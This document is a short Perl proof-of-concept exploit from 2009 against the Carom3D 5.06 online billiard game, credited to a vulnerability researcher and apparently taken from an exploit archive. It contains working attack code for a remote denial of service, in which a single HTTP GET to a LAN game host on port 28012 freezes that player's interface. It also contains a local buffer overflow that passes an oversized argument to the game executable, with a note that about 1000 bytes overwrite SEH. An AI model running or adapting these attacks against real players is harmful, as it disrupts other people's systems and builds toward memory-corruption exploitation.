Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability
Source: vfocus.net  Author: vfocus  Published: 2009-06-17
#!/usr/bin/perl
#
# Title: Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability
#
#
# Summary: Carom 3D is an online multi-user billiard game created with special
#	   3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8
#	   ball and other Billiard games to life.
#
# Product Web Page: http://www.carom3d.com/
#
# Description: The world famous Korean game Carom3D suffers from a buffer overflow
#	       and a denial of service vulnerability. The BoF is triggered at
#	       runtime when 218 or more bytes are appended as an argument. ~1000
#	       bytes overwrite SEH. The denial of service is triggered when a user
#	       creates a LAN Game (cred. needed), creates a room and awaits
#	       other players to join the game. While awaiting (listening on port
#	       28012), with a simple HTTP GET/POST, an attacker can lock down
#	       the GUI of the user who created the room, not allowing them to start
#	       or even exit the game's GUI, unless it is force-quit (X).
#
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 15.06.2009
#

# ----------------------------------DoS---------------------------------- #

use LWP::Simple;

my $url = 'http://192.168.1.3:28012';
my $lockdown = get $url;
die "Couldn't get $url" unless defined $lockdown;

# You can Ctrl+C, the lockdown is ON.

# ---------------------------------/DoS---------------------------------- #





###########################################################################





# ----------------------------------BoF---------------------------------- #

# Added 217 bytes as argument = runs normally.
# Added 218 bytes as argument triggers the MS VC++ Runtime Library
# 'Buffer Overrun' error msg box informing us that the program's
# internal state is corrupted.

system('C:\\Progra~1\\Neoact\\Carom3D\\carom.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

# ---------------------------------/BoF---------------------------------- #

# [2009-06-16]

 